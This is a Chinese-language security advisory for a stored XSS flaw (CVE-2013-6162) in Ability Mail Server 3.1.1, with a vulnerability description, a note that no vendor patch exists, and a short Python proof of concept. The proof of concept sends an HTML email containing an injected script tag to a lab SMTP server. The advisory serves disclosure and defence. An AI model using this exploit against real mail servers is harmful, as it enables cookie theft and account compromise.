Ability Mail Server 'Body'标签元素HTML注入漏洞
发布日期:2013-12-17
更新日期:2013-12-18
受影响系统:Code-Crafters Ability Mail Server 2013 (3.1.1)
描述:
BUGTRAQ ID:
64391
CVE(CAN) ID:
CVE-2013-6162
Ability Mail Server是网络邮件服务器软件,支持SMTP、POP3、WebMail等常用功能。
Ability Mail Server 3.1.1及其他客户端版本在处理嵌入了JS的特制电子邮件的实现上存在存储型XSS漏洞,攻击者可利用此漏洞盗取cookie。
<*来源:David Um
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/env python
'''
Exploit Title: Ability Mail Server 2013 Stored XSS
Date: 12/20/2013
Exploit Author: David Um
Vendor Homepage:
http://www.code-crafters.com/
Software Link:
http://download.code-crafters.com/ams.exe
Version: 3.1.1
Tested on: Windows Server 2003 SP2
CVE : CVE-2013-6162
Description: This proof of concept demonstrates a stored XSS vulnerability in e-mail clients when JavaScript is inserted into the body of an e-mail.
'''
import smtplib
email_addr = 'user@hack.local'
email = 'From: %s\n' % email_addr
email += 'To: %s\n' % email_addr
email += 'Subject: XSS\n'
email += 'Content-type: text/html\n\n'
email += '<script>alert("XSS")</script>'
s = smtplib.SMTP('192.168.58.140', 25)
s.login(email_addr, "user")
s.sendmail(email_addr, email_addr, email)
s.quit()
建议:
厂商补丁:
Code-Crafters
-------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.code-crafters.com/浏览次数:2307
严重程度:0(网友投票)